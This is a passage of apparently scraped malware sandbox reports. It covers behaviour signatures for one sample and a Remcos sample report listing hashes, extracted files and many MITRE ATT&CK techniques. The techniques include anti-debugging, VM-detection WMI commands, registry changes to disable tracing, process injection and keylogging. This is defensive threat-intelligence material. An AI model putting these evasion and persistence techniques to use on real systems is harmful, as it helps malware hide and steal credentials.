allocating memory with PAGE_GUARD access rights (Handle: 4294967295); (PID: 2512)", "origin": "API Call", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "api-238", "type": 6, "relevance": 5, "name": "Tries to detect debugger using ProcessDebugPort", "description": "\"Deepseed Checker.exe queries ProcessDebugPort (UID: 2512)", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-24", "type": 6, "relevance": 10, "name": "Tries to sleep for a long time (more than two minutes)", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" sleeping for \"1566804069\" milliseconds", "origin": "API Call", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "string-55", "type": 2, "relevance": 10, "name": "Found a reference to a WMI query string known to be used for VM detection", "description": "\"/C wmic path win32_ComputerSystem get model\" (Indicator: \" win32_computersystem\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")", "origin": "File/Memory", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "string-126", "type": 2, "relevance": 3, "name": "Found system commands related strings", "description": "Found string \"netstat\" (Indicator: \"netstat\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hAifIHNdlq\\Deepseed Checker.exe\" (Handle: 1416)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hAifIHNdlq\\Deepseed Checker.exe\" (Handle: 1416)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hAifIHNdlq\\Deepseed Checker.exe\" (Handle: 1416)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "string-32", "type": 2, "relevance": 5, "name": "Found an indicator for a scheduled task trigger", "description": "file/memory contains long string with (Indicator: \"LogonTrigger\"; File: \"00000000-00002512.00000001.90116.010B2000.00000020.mdmp\")\n Found string \"td.Triggers.Add(new LogonTrigger());\" (Indicator: \"LogonTrigger\"; Source: \"00000000-00002512.00000001.90116.010B2000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1053", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "registry-30", "type": 3, "relevance": 5, "name": "Modifies file/console tracing settings (often used to hide footprints on system)", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"ENABLEFILETRACING\"; Value: \"00000000\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"ENABLECONSOLETRACING\"; Value: \"00000000\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"FILETRACINGMASK\"; Value: \"0000FFFF\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"CONSOLETRACINGMASK\"; Value: \"0000FFFF\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_90% (D)", "origin": "External System"}]}
aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5
https://hybrid-analysis.com/sample/aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5
Hybrid Analysis - Remcos
{"size": 493568, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5", "sha256": "aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5", "av_detect": 87, "vx_family": "Remcos.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 1, "total_processes": 1, "total_signatures": 184, "extracted_files": [{"name": "Ing.dat", "file_path": "%ALLUSERSPROFILE%\\Install\\Ing.dat", "file_size": 192, "sha256": "cb2f341175e6c926e402eea057711591faf43dad6e12a4b0b5281ab1110097bb", "type_tags": ["data"], "description": "data", "runtime_process": "aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe (PID: 6040)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dism.log", "file_size": 279678, "sha256": "02de2e3a06de9138bbcdaadc0133ca2c3813f89f7e768c6d15eaa8bb15507c2f", "type_tags": ["text"], "description": "Unicode text, UTF-8 (with BOM) text, with very long lines (312), with CRLF line terminators", "runtime_process": "aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe (PID: 6040)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "DISMHOST.EXE.67A9CC1C.bin", "file_size": 82944, "sha256": "ecb636b278261eade712e68ec7d805d20e802628248da872d3d0ada1432ffc11", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe (PID: 6040)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 27051)", "99 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 27051)"], "imported_objects": ["25 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "26 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 26706)", "33 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 26706)", "62 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 26706)", "2 .OBJ Files linked with ALIASOBJ.EXE 11.00 (Internal OLDNAMES.LIB Tool) (build: 41118)", "1 .CPP Files compiled with CL.EXE 15.00 (Visual Studio 2008) (build: 30729)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a medium codebase (99 files)"], "total_file_compositions_imports": 321}, "processes": [{"uid": "00000000-00006040", "name": "aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe", "normalized_path": "C:\\aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe", "sha256": "aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5"}], "mitre_attcks": [{"tactic": "Resource Development", "technique": "Digital Certificates", "attck_id": "T1588.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1588/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Obtain Capabilities", "attck_id": "T1588", "attck_id_wiki": "https://attack.mitre.org/techniques/T1588"}}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 12}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Direct Volume Access", "attck_id": "T1006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1006", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Web Browsers", "attck_id": "T1555.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}}, {"tactic": "Credential Access", "technique": "Steal Web Session Cookie", "attck_id": "T1539", "attck_id_wiki": "https://attack.mitre.org/techniques/T1539", "suspicious_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "informative_identifiers_count": 18}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Network Connections Discovery", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "malicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 3, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Archive Collected Data", "attck_id": "T1560", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": 